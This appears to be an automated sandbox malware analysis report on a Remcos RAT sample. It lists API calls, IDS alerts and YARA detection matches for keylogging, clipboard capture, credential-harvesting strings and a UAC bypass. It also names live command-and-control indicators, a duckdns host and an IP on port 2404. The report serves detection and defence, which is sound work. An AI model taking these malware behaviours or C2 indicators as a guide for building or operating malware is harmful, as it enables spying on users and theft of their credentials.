                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407CD2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 4x nop then jmp 044F79E8h0_2_044F7C29
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 4x nop then jmp 05316C80h10_2_05316EC1

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49712 -> 103.186.117.77:2404
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 103.186.117.77:2404 -> 192.168.2.5:49712
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: bubemoney7221.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: bubemoney7221.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.5:49712 -> 103.186.117.77:2404
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewIP Address: 103.186.117.77 103.186.117.77
                    Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49714 -> 178.237.33.50:80
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,15_2_0041B411
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142903855.00000000018BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142903855.00000000018BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: bubemoney7221.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001187000.00000004.00000020.00020000.00000000.sdmp, mXJeXQoaGktJCW.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpj
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081220556.000000000252A000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000A.00000002.2120600305.0000000003349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142038542.0000000001384000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142368681.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142368681.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142903855.00000000018BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142368681.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000015_2_0040A2F3
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B749
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168FC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_0040987A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_004072B5
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B749
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_0040A41B
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\dfgh\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041CA73 SystemParametersInfoW,15_2_0041CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05068A18 NtQueryInformationProcess,0_2_05068A18
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05068F50 NtQueryInformationProcess,0_2_05068F50
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D8A18 NtQueryInformationProcess,10_2_077D8A18
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D8F50 NtQueryInformationProcess,10_2_077D8F50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167EF
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0232DE0C0_2_0232DE0C
